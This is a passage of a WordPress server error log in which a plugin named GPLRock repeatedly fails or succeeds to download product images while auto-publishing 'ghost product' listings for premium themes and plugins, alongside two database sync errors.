HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:47 UTC] GPLRock: Image download failed for product kids-baby-shop-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kids---baby-shop--store-woocommerce-theme-9074.webp for product kids-baby-shop-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:02:49 UTC] GPLRock WARNING: Image download failed for product kids-baby-shop-store-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/kids---baby-shop--store-woocommerce-theme-9074.webp [05-Apr-2026 02:02:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kids-baby-shop-store-woocommerce-theme [05-Apr-2026 02:02:49 UTC] GPLRock: Image download failed for product heaven-hands-non-profit-charity-fundraising-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:51 UTC] GPLRock: Image download failed for product heaven-hands-non-profit-charity-fundraising-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/heaven-hands--non-profit-charity--fundraising-wordpress-theme-4592.webp for product heaven-hands-non-profit-charity-fundraising-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:02:54 UTC] GPLRock: Image download failed for product heaven-hands-non-profit-charity-fundraising-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:56 UTC] GPLRock: Image download failed for product heaven-hands-non-profit-charity-fundraising-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/heaven-hands--non-profit-charity--fundraising-wordpress-theme-4592.webp for product heaven-hands-non-profit-charity-fundraising-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:02:58 UTC] GPLRock WARNING: Image download failed for product heaven-hands-non-profit-charity-fundraising-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/heaven-hands--non-profit-charity--fundraising-wordpress-theme-4592.webp [05-Apr-2026 02:02:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: heaven-hands-non-profit-charity-fundraising-wordpress-theme [05-Apr-2026 02:02:58 UTC] GPLRock: Image download failed for product giver-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:00 UTC] GPLRock: Image download failed for product giver-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/giver---senior-care-wordpress-theme-18729.webp for product giver-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:03 UTC] GPLRock: Image download failed for product giver-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:05 UTC] GPLRock: Image download failed for product giver-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/giver---senior-care-wordpress-theme-18729.webp for product giver-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:07 UTC] GPLRock WARNING: Image download failed for product giver-senior-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/giver---senior-care-wordpress-theme-18729.webp [05-Apr-2026 02:03:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: giver-senior-care-wordpress-theme [05-Apr-2026 02:03:07 UTC] GPLRock: Image download failed for product doweco-furniture-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:09 UTC] GPLRock: Image download failed for product doweco-furniture-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doweco--furniture-store-wordpress-theme-27344.webp for product doweco-furniture-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:11 UTC] GPLRock: Image download failed for product doweco-furniture-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:13 UTC] GPLRock: Image download failed for product doweco-furniture-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doweco--furniture-store-wordpress-theme-27344.webp for product doweco-furniture-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:15 UTC] GPLRock WARNING: Image download failed for product doweco-furniture-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/doweco--furniture-store-wordpress-theme-27344.webp [05-Apr-2026 02:03:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: doweco-furniture-store-wordpress-theme [05-Apr-2026 02:03:16 UTC] GPLRock: Image download failed for product binduz-blog-magazine-newspaper-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:18 UTC] GPLRock: Image download failed for product binduz-blog-magazine-newspaper-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/binduz---blog-magazine-newspaper-wordpress-theme-7390.webp for product binduz-blog-magazine-newspaper-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:20 UTC] GPLRock: Image download failed for product binduz-blog-magazine-newspaper-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:22 UTC] GPLRock: Image download failed for product binduz-blog-magazine-newspaper-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/binduz---blog-magazine-newspaper-wordpress-theme-7390.webp for product binduz-blog-magazine-newspaper-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:24 UTC] GPLRock WARNING: Image download failed for product binduz-blog-magazine-newspaper-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/binduz---blog-magazine-newspaper-wordpress-theme-7390.webp [05-Apr-2026 02:03:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: binduz-blog-magazine-newspaper-wordpress-theme [05-Apr-2026 02:03:24 UTC] GPLRock: Image download failed for product flex-multi-purpose-joomla-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:26 UTC] GPLRock: Image download failed for product flex-multi-purpose-joomla-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flex---multi-purpose-joomla-template-18747.webp for product flex-multi-purpose-joomla-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:29 UTC] GPLRock: Image download failed for product flex-multi-purpose-joomla-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:31 UTC] GPLRock: Image download failed for product flex-multi-purpose-joomla-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flex---multi-purpose-joomla-template-18747.webp for product flex-multi-purpose-joomla-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:33 UTC] GPLRock WARNING: Image download failed for product flex-multi-purpose-joomla-template. URL: https://meldwp.com/wp-content/uploads/flex---multi-purpose-joomla-template-18747.webp [05-Apr-2026 02:03:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flex-multi-purpose-joomla-template [05-Apr-2026 02:03:33 UTC] GPLRock: Image download failed for product moreau-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:35 UTC] GPLRock: Image download failed for product moreau-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moreau---creative-portfolio-wordpress-theme-18737.webp for product moreau-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:37 UTC] GPLRock: Image download failed for product moreau-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:39 UTC] GPLRock: Image download failed for product moreau-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moreau---creative-portfolio-wordpress-theme-18737.webp for product moreau-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:41 UTC] GPLRock WARNING: Image download failed for product moreau-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/moreau---creative-portfolio-wordpress-theme-18737.webp [05-Apr-2026 02:03:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: moreau-creative-portfolio-wordpress-theme [05-Apr-2026 02:03:42 UTC] GPLRock: Image downloaded successfully for product tacon-a-showcase-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-de0bc6e0.webp [05-Apr-2026 02:03:42 UTC] GPLRock: Using pre-downloaded image for product tacon-a-showcase-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-de0bc6e0.webp [05-Apr-2026 02:03:42 UTC] GPLRock: Ghost product published with image - Product ID: tacon-a-showcase-portfolio-wordpress-theme [05-Apr-2026 02:03:42 UTC] GPLRock: Image download failed for product travesia-travel-agency-and-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:44 UTC] GPLRock: Image download failed for product travesia-travel-agency-and-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travesia--travel-agency-and-tour-booking-wordpress-theme-11091.webp for product travesia-travel-agency-and-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:46 UTC] GPLRock: Image download failed for product travesia-travel-agency-and-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:48 UTC] GPLRock: Image download failed for product travesia-travel-agency-and-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:03:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travesia--travel-agency-and-tour-booking-wordpress-theme-11091.webp for product travesia-travel-agency-and-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:03:50 UTC] GPLRock WARNING: Image download failed for product travesia-travel-agency-and-tour-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/travesia--travel-agency-and-tour-booking-wordpress-theme-11091.webp [05-Apr-2026 02:03:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travesia-travel-agency-and-tour-booking-wordpress-theme [05-Apr-2026 02:04:21 UTC] GPLRock: Image downloaded successfully for product ultimate-member-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0781a65c.png [05-Apr-2026 02:04:21 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0781a65c.png [05-Apr-2026 02:04:21 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-wordpress-theme [05-Apr-2026 02:04:24 UTC] GPLRock: Image downloaded successfully for product bosmarket-flexible-multivendor-elementor-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2c955481.png [05-Apr-2026 02:04:24 UTC] GPLRock: Using pre-downloaded image for product bosmarket-flexible-multivendor-elementor-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2c955481.png [05-Apr-2026 02:04:24 UTC] GPLRock: Ghost product published with image - Product ID: bosmarket-flexible-multivendor-elementor-woocommerce-wordpress-theme [05-Apr-2026 02:04:26 UTC] GPLRock: Image downloaded successfully for product peepso-unlimited-bundles (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ad7c6592.png [05-Apr-2026 02:04:26 UTC] GPLRock: Using pre-downloaded image for product peepso-unlimited-bundles: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ad7c6592.png [05-Apr-2026 02:04:26 UTC] GPLRock: Ghost product published with image - Product ID: peepso-unlimited-bundles [05-Apr-2026 02:04:28 UTC] GPLRock: Image downloaded successfully for product delivery-drivers-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67224328.png [05-Apr-2026 02:04:28 UTC] GPLRock: Using pre-downloaded image for product delivery-drivers-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67224328.png [05-Apr-2026 02:04:28 UTC] GPLRock: Ghost product published with image - Product ID: delivery-drivers-manager [05-Apr-2026 02:04:29 UTC] GPLRock: Image downloaded successfully for product delivery-drivers-for-vendors-marketplace (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bee6709c.png [05-Apr-2026 02:04:29 UTC] GPLRock: Using pre-downloaded image for product delivery-drivers-for-vendors-marketplace: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bee6709c.png [05-Apr-2026 02:04:29 UTC] GPLRock: Ghost product published with image - Product ID: delivery-drivers-for-vendors-marketplace [05-Apr-2026 02:04:30 UTC] GPLRock: Image downloaded successfully for product kunco-charity-fundraising-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4252ce51.jpg [05-Apr-2026 02:04:30 UTC] GPLRock: Using pre-downloaded image for product kunco-charity-fundraising-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4252ce51.jpg [05-Apr-2026 02:04:30 UTC] GPLRock: Ghost product published with image - Product ID: kunco-charity-fundraising-wordpress-theme [05-Apr-2026 02:04:32 UTC] GPLRock: Image downloaded successfully for product iconic-woocommerce-delivery-slots (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e8470df.jpg [05-Apr-2026 02:04:32 UTC] GPLRock: Using pre-downloaded image for product iconic-woocommerce-delivery-slots: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e8470df.jpg [05-Apr-2026 02:04:32 UTC] GPLRock: Ghost product published with image - Product ID: iconic-woocommerce-delivery-slots [05-Apr-2026 02:04:33 UTC] GPLRock: Image downloaded successfully for product pinkmart-ajax-theme-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3889a498.avif [05-Apr-2026 02:04:33 UTC] GPLRock: Using pre-downloaded image for product pinkmart-ajax-theme-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3889a498.avif [05-Apr-2026 02:04:33 UTC] GPLRock: Ghost product published with image - Product ID: pinkmart-ajax-theme-for-woocommerce [05-Apr-2026 02:04:35 UTC] GPLRock: Image downloaded successfully for product riode-multi-purpose-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd18dadb.jpg [05-Apr-2026 02:04:35 UTC] GPLRock: Using pre-downloaded image for product riode-multi-purpose-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd18dadb.jpg [05-Apr-2026 02:04:35 UTC] GPLRock: Ghost product published with image - Product ID: riode-multi-purpose-woocommerce-theme [05-Apr-2026 02:04:36 UTC] GPLRock: Image downloaded successfully for product vikinger-buddypress-and-gamipress-social-community (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-152ca5be.jpg [05-Apr-2026 02:04:36 UTC] GPLRock: Using pre-downloaded image for product vikinger-buddypress-and-gamipress-social-community: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-152ca5be.jpg [05-Apr-2026 02:04:36 UTC] GPLRock: Ghost product published with image - Product ID: vikinger-buddypress-and-gamipress-social-community [05-Apr-2026 02:06:19 UTC] GPLRock: Image downloaded successfully for product woocommerce-gocardless (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-81c1707b.jpg [05-Apr-2026 02:06:19 UTC] GPLRock: Using pre-downloaded image for product woocommerce-gocardless: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-81c1707b.jpg [05-Apr-2026 02:06:19 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-gocardless [05-Apr-2026 02:06:21 UTC] GPLRock: Image downloaded successfully for product popup-maker-leaving-notices (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eaec5045.jpg [05-Apr-2026 02:06:21 UTC] GPLRock: Using pre-downloaded image for product popup-maker-leaving-notices: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eaec5045.jpg [05-Apr-2026 02:06:21 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-leaving-notices [05-Apr-2026 02:06:22 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-wish-lists (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-81d59da3.jpg [05-Apr-2026 02:06:22 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-wish-lists: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-81d59da3.jpg [05-Apr-2026 02:06:22 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-wish-lists [05-Apr-2026 02:06:24 UTC] GPLRock: Image downloaded successfully for product eventon-rsvp-events (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa05ed16.jpg [05-Apr-2026 02:06:24 UTC] GPLRock: Using pre-downloaded image for product eventon-rsvp-events: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa05ed16.jpg [05-Apr-2026 02:06:24 UTC] GPLRock: Ghost product published with image - Product ID: eventon-rsvp-events [05-Apr-2026 02:06:25 UTC] GPLRock: Image downloaded successfully for product popup-maker-advanced-targeting-conditions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-faa97b10.jpg [05-Apr-2026 02:06:25 UTC] GPLRock: Using pre-downloaded image for product popup-maker-advanced-targeting-conditions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-faa97b10.jpg [05-Apr-2026 02:06:25 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-advanced-targeting-conditions [05-Apr-2026 02:06:27 UTC] GPLRock: Image downloaded successfully for product actionable-google-analytics-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c8660353.jpg [05-Apr-2026 02:06:27 UTC] GPLRock: Using pre-downloaded image for product actionable-google-analytics-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c8660353.jpg [05-Apr-2026 02:06:27 UTC] GPLRock: Ghost product published with image - Product ID: actionable-google-analytics-for-woocommerce [05-Apr-2026 02:06:28 UTC] GPLRock: Image downloaded successfully for product woocommerce-customer-history (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cb129650.jpg [05-Apr-2026 02:06:28 UTC] GPLRock: Using pre-downloaded image for product woocommerce-customer-history: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cb129650.jpg [05-Apr-2026 02:06:28 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-customer-history [05-Apr-2026 02:06:30 UTC] GPLRock: Image downloaded successfully for product yith-frontend-manager-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-91f277d3.jpg [05-Apr-2026 02:06:30 UTC] GPLRock: Using pre-downloaded image for product yith-frontend-manager-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-91f277d3.jpg [05-Apr-2026 02:06:30 UTC] GPLRock: Ghost product published with image - Product ID: yith-frontend-manager-for-woocommerce-premium [05-Apr-2026 02:06:31 UTC] GPLRock: Image downloaded successfully for product oceanwp-instagram (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-86f17913.jpg [05-Apr-2026 02:06:31 UTC] GPLRock: Using pre-downloaded image for product oceanwp-instagram: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-86f17913.jpg [05-Apr-2026 02:06:31 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-instagram [05-Apr-2026 02:06:33 UTC] GPLRock: Image downloaded successfully for product photomosaic-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cfbeb1fd.jpg [05-Apr-2026 02:06:33 UTC] GPLRock: Using pre-downloaded image for product photomosaic-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cfbeb1fd.jpg [05-Apr-2026 02:06:33 UTC] GPLRock: Ghost product published with image - Product ID: photomosaic-for-wordpress [05-Apr-2026 02:06:38 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [05-Apr-2026 02:06:38 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775354798.5990769863128662109375', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [05-Apr-2026 02:08:21 UTC] GPLRock: Image downloaded successfully for product toyshop-storefront-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5f0dca0.jpg [05-Apr-2026 02:08:21 UTC] GPLRock: Using pre-downloaded image for product toyshop-storefront-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5f0dca0.jpg [05-Apr-2026 02:08:21 UTC] GPLRock: Ghost product published with image - Product ID: toyshop-storefront-woocommerce-theme [05-Apr-2026 02:08:22 UTC] GPLRock: Image downloaded successfully for product mainwp-clean-and-lock (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68402696.jpg [05-Apr-2026 02:08:22 UTC] GPLRock: Using pre-downloaded image for product mainwp-clean-and-lock: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68402696.jpg [05-Apr-2026 02:08:22 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-clean-and-lock [05-Apr-2026 02:08:24 UTC] GPLRock: Image downloaded successfully for product capri-a-hot-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7c4c299b.jpg [05-Apr-2026 02:08:24 UTC] GPLRock: Using pre-downloaded image for product capri-a-hot-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7c4c299b.jpg [05-Apr-2026 02:08:24 UTC] GPLRock: Ghost product published with image - Product ID: capri-a-hot-multi-purpose-theme [05-Apr-2026 02:08:26 UTC] GPLRock: Image downloaded successfully for product ninja-forms-mad-mimi (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bd99585f.jpg [05-Apr-2026 02:08:26 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-mad-mimi: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bd99585f.jpg [05-Apr-2026 02:08:26 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-mad-mimi [05-Apr-2026 02:08:28 UTC] GPLRock: Image downloaded successfully for product marketica-ecommerce-and-marketplace-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11999973.jpg [05-Apr-2026 02:08:28 UTC] GPLRock: Using pre-downloaded image for product marketica-ecommerce-and-marketplace-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11999973.jpg [05-Apr-2026 02:08:28 UTC] GPLRock: Ghost product published with image - Product ID: marketica-ecommerce-and-marketplace-woocommerce-wordpress-theme [05-Apr-2026 02:08:29 UTC] GPLRock: Image downloaded successfully for product woocommerce-conditional-content (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e96415b3.jpg [05-Apr-2026 02:08:29 UTC] GPLRock: Using pre-downloaded image for product woocommerce-conditional-content: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e96415b3.jpg [05-Apr-2026 02:08:29 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-conditional-content [05-Apr-2026 02:08:31 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-content-restriction (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-909fe267.jpg [05-Apr-2026 02:08:31 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-content-restriction: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-909fe267.jpg [05-Apr-2026 02:08:31 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-content-restriction [05-Apr-2026 02:08:32 UTC] GPLRock: Image downloaded successfully for product eventon-event-lists-ext (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1ffcb9a1.jpg [05-Apr-2026 02:08:32 UTC] GPLRock: Using pre-downloaded image for product eventon-event-lists-ext: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1ffcb9a1.jpg [05-Apr-2026 02:08:32 UTC] GPLRock: Ghost product published with image - Product ID: eventon-event-lists-ext [05-Apr-2026 02:08:34 UTC] GPLRock: Image downloaded successfully for product yith-boemia-the-best-wordpress-e-commerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ded27053.jpg [05-Apr-2026 02:08:34 UTC] GPLRock: Using pre-downloaded image for product yith-boemia-the-best-wordpress-e-commerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ded27053.jpg [05-Apr-2026 02:08:34 UTC] GPLRock: Ghost product published with image - Product ID: yith-boemia-the-best-wordpress-e-commerce-theme [05-Apr-2026 02:08:35 UTC] GPLRock: Image downloaded successfully for product pw-carousel-slider-post-layout-for-visual-composer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-daab8e5d.jpg [05-Apr-2026 02:08:35 UTC] GPLRock: Using pre-downloaded image for product pw-carousel-slider-post-layout-for-visual-composer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-daab8e5d.jpg [05-Apr-2026 02:08:35 UTC] GPLRock: Ghost product published with image - Product ID: pw-carousel-slider-post-layout-for-visual-composer [05-Apr-2026 02:10:16 UTC] GPLRock: Image downloaded successfully for product woocommerce-multi-currency-currency-switcher (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6efab12a.jpg [05-Apr-2026 02:10:16 UTC] GPLRock: Using pre-downloaded image for product woocommerce-multi-currency-currency-switcher: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6efab12a.jpg [05-Apr-2026 02:10:16 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-multi-currency-currency-switcher [05-Apr-2026 